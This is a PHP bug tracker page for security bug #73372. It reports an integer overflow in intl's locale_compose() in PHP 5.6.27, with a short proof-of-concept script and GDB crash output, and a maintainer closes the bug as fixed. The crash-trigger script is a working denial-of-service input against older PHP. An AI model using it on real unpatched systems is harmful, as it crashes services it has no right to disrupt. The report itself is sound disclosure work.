php.net |  support |  documentation |  report a bug |  advanced search |  search howto |  statistics |  random bug |  login
Sec Bug #73372 crash in locale_compose() function
Submitted: 2016-10-22 10:12 UTC Modified: 2016-11-07 20:25 UTC
From: nguyenluan dot vnn at gmail dot com Assigned: stas (profile)
Status: Closed Package: intl (PECL)
PHP Version: 5.6.27 OS:
Private report: No CVE-ID: None
Welcome back! If you're the original bug submitter, here's where you can edit the bug or add additional notes.
If you forgot your password, you can retrieve your password here.
Password:
Status:
Package:
Bug Type:
Summary:
From: nguyenluan dot vnn at gmail dot com
New email:
PHP Version: OS:

 

 [2016-10-22 10:12 UTC] nguyenluan dot vnn at gmail dot com
Description:
------------
Function locale_compose() could produce string larger than 2Gb. Please refer to the test script and GDB output.

Test script:
---------------
<?php
    ini_set('memory_limit', -1);
       
    $str = str_repeat('a', 0x7fffffff);
    $arr = array(
        'language'=>$str ,
        'script'  =>'Hans' ,
        'region'  =>'CN',
        'variant2'=>'rozaj' ,
        'variant1'=>'nedis' ,
        'private1'=>'prv1' ,
        'private2'=>'prv2'
    );
    $str1 = locale_compose($arr);

    var_dump(strlen($str1));
?>

Expected result:
----------------
No crash. No string returns.

Actual result:
--------------
gdb-peda$ r ../test/string/test.php 
Starting program: /home/user/Desktop/php-5.6.27/sapi/cli/php ../test/string/test.php
[Thread debugging using libthread_db enabled]
Using host libthread_db library "/lib/x86_64-linux-gnu/libthread_db.so.1".
int(-2147483617)  // string larger than 2Gb

Program received signal SIGSEGV, Segmentation fault.

 [----------------------------------registers-----------------------------------]
RAX: 0x7ffe6b66908f 
RBX: 0x0 
RCX: 0x10c89b8 ("/home/user/Desktop/php-5.6.27/Zend/zend_execute.h")
RDX: 0x7ffeeb669070 ('a' <repeats 200 times>...)
RSI: 0x10c89b8 ("/home/user/Desktop/php-5.6.27/Zend/zend_execute.h")
RDI: 0x7ffff7fba970 --> 0x7ffeeb669070 ('a' <repeats 200 times>...)
RBP: 0x7fffffffb9b0 --> 0x7fffffffb9e0 --> 0x7fffffffba10 --> 0x7fffffffba40 --> 0x7fffffffba60 --> 0x7fffffffba80 (--> ...)
RSP: 0x7fffffffb990 --> 0x7 
RIP: 0xa9b8be (<_zval_dtor_func+99>:	movzx  eax,BYTE PTR [rax])
R8 : 0x136 
R9 : 0x10c89b8 ("/home/user/Desktop/php-5.6.27/Zend/zend_execute.h")
R10: 0x86f 
R11: 0x7ffff3603730 --> 0xfffda400fffda12f 
R12: 0x444220 (<_start>:	xor    ebp,ebp)
R13: 0x7fffffffe1a0 --> 0x2 
R14: 0x0 
R15: 0x0
EFLAGS: 0x10203 (CARRY parity adjust zero sign trap INTERRUPT direction overflow)
[-------------------------------------code-------------------------------------]
   0xa9b8b6 <_zval_dtor_func+91>:	mov    eax,DWORD PTR [rax+0x8]
   0xa9b8b9 <_zval_dtor_func+94>:	cdqe   
   0xa9b8bb <_zval_dtor_func+96>:	add    rax,rdx
=> 0xa9b8be <_zval_dtor_func+99>:	movzx  eax,BYTE PTR [rax]
   0xa9b8c1 <_zval_dtor_func+102>:	test   al,al
   0xa9b8c3 <_zval_dtor_func+104>:	je     0xa9b8f2 <_zval_dtor_func+151>
   0xa9b8c5 <_zval_dtor_func+106>:	mov    rax,QWORD PTR [rbp-0x8]
   0xa9b8c9 <_zval_dtor_func+110>:	mov    rax,QWORD PTR [rax]
[------------------------------------stack-------------------------------------]
0000| 0x7fffffffb990 --> 0x7 
0008| 0x7fffffffb998 --> 0x4ff7f843f8 
0016| 0x7fffffffb9a0 --> 0x10c89b8 ("/home/user/Desktop/php-5.6.27/Zend/zend_execute.h")
0024| 0x7fffffffb9a8 --> 0x7ffff7fba970 --> 0x7ffeeb669070 ('a' <repeats 200 times>...)
0032| 0x7fffffffb9b0 --> 0x7fffffffb9e0 --> 0x7fffffffba10 --> 0x7fffffffba40 --> 0x7fffffffba60 --> 0x7fffffffba80 (--> ...)
0040| 0x7fffffffb9b8 --> 0xa8680d (<_zval_dtor+53>:	jmp    0xa86810 <_zval_dtor+56>)
0048| 0x7fffffffb9c0 ("/usr/local/lO")
0056| 0x7fffffffb9c8 --> 0x4f6c2f6c61 ('al/lO')
[------------------------------------------------------------------------------]
Legend: code, data, rodata, value
Stopped reason: SIGSEGV
0x0000000000a9b8be in _zval_dtor_func (zvalue=0x7ffff7fba970, 
    __zend_filename=0x10c89b8 "/home/user/Desktop/php-5.6.27/Zend/zend_execute.h", __zend_lineno=0x4f)
    at /home/user/Desktop/php-5.6.27/Zend/zend_variables.c:36
36				CHECK_ZVAL_STRING_REL(zvalue);

gdb-peda$ bt
#0  0x0000000000a9b8be in _zval_dtor_func (zvalue=0x7ffff7fba970, 
    __zend_filename=0x10c89b8 "/home/user/Desktop/php-5.6.27/Zend/zend_execute.h", __zend_lineno=0x4f)
    at /home/user/Desktop/php-5.6.27/Zend/zend_variables.c:36
#1  0x0000000000a8680d in _zval_dtor (zvalue=0x7ffff7fba970, 
    __zend_filename=0x10c89b8 "/home/user/Desktop/php-5.6.27/Zend/zend_execute.h", __zend_lineno=0x4f)
    at /home/user/Desktop/php-5.6.27/Zend/zend_variables.h:35
#2  0x0000000000a868d8 in i_zval_ptr_dtor (zval_ptr=0x7ffff7fba970, 
    __zend_filename=0x10caca0 "/home/user/Desktop/php-5.6.27/Zend/zend_variables.c", __zend_lineno=0xbc)
    at /home/user/Desktop/php-5.6.27/Zend/zend_execute.h:79
#3  0x0000000000a87bb1 in _zval_ptr_dtor (zval_ptr=0x7ffff7fbaa00, 
    __zend_filename=0x10caca0 "/home/user/Desktop/php-5.6.27/Zend/zend_variables.c", __zend_lineno=0xbc)
    at /home/user/Desktop/php-5.6.27/Zend/zend_execute_API.c:424
#4  0x0000000000a9be29 in _zval_ptr_dtor_wrapper (zval_ptr=0x7ffff7fbaa00)
    at /home/user/Desktop/php-5.6.27/Zend/zend_variables.c:188
#5  0x0000000000ab0cf9 in i_zend_hash_bucket_delete (
    ht=0x145cb28 <executor_globals+360>, p=0x7ffff7fba9e8)
    at /home/user/Desktop/php-5.6.27/Zend/zend_hash.c:182
#6  0x0000000000ab0dd1 in zend_hash_bucket_delete (
    ht=0x145cb28 <executor_globals+360>, p=0x7ffff7fba9e8)
    at /home/user/Desktop/php-5.6.27/Zend/zend_hash.c:192
#7  0x0000000000ab2ae4 in zend_hash_graceful_reverse_destroy (
    ht=0x145cb28 <executor_globals+360>)
    at /home/user/Desktop/php-5.6.27/Zend/zend_hash.c:613
#8  0x0000000000a873ad in shutdown_executor ()
    at /home/user/Desktop/php-5.6.27/Zend/zend_execute_API.c:244
#9  0x0000000000a9e177 in zend_deactivate ()
    at /home/user/Desktop/php-5.6.27/Zend/zend.c:960
#10 0x00000000009ff252 in php_request_shutdown (dummy=0x0)
    at /home/user/Desktop/php-5.6.27/main/main.c:1899
#11 0x0000000000b5cf24 in do_cli (argc=0x2, argv=0x1461630)
    at /home/user/Desktop/php-5.6.27/sapi/cli/php_cli.c:1181
#12 0x0000000000b5d7b6 in main (argc=0x2, argv=0x1461630)
    at /home/user/Desktop/php-5.6.27/sapi/cli/php_cli.c:1382
#13 0x00007ffff348f830 in __libc_start_main (main=0xb5cf99 <main>, argc=0x2, 
    argv=0x7fffffffe1a8, init=<optimized out>, fini=<optimized out>, 
    rtld_fini=<optimized out>, stack_end=0x7fffffffe198)
    at ../csu/libc-start.c:291
#14 0x0000000000444249 in _start ()


Patches

Pull Requests

History

AllCommentsChangesGit/SVN commitsRelated reports
 [2016-11-04 06:01 UTC] stas@php.net
-Status: Open +Status: Closed -Assigned To: +Assigned To: stas
 [2016-11-04 06:01 UTC] stas@php.net
The fix for this bug has been committed.

Snapshots of the sources are packaged every three hours; this change
will be in the next snapshot. You can grab the snapshot at
http://snaps.php.net/.

 For Windows:

http://windows.php.net/snapshots/
 
Thank you for the report, and for helping us make PHP better.
 [2016-11-07 08:43 UTC] nguyenluan dot vnn at gmail dot com
Since the bug is fixed can you mark "Private report" as "No"?

Thanks.
 [2016-11-07 08:43 UTC] nguyenluan dot vnn at gmail dot com
Since the bug is fixed can you mark "Private report" as "No"?

Thanks.
 
PHP Copyright © 2001-2024 The PHP Group
All rights reserved.
Last updated: Sat Dec 21 16:01:28 2024 UTC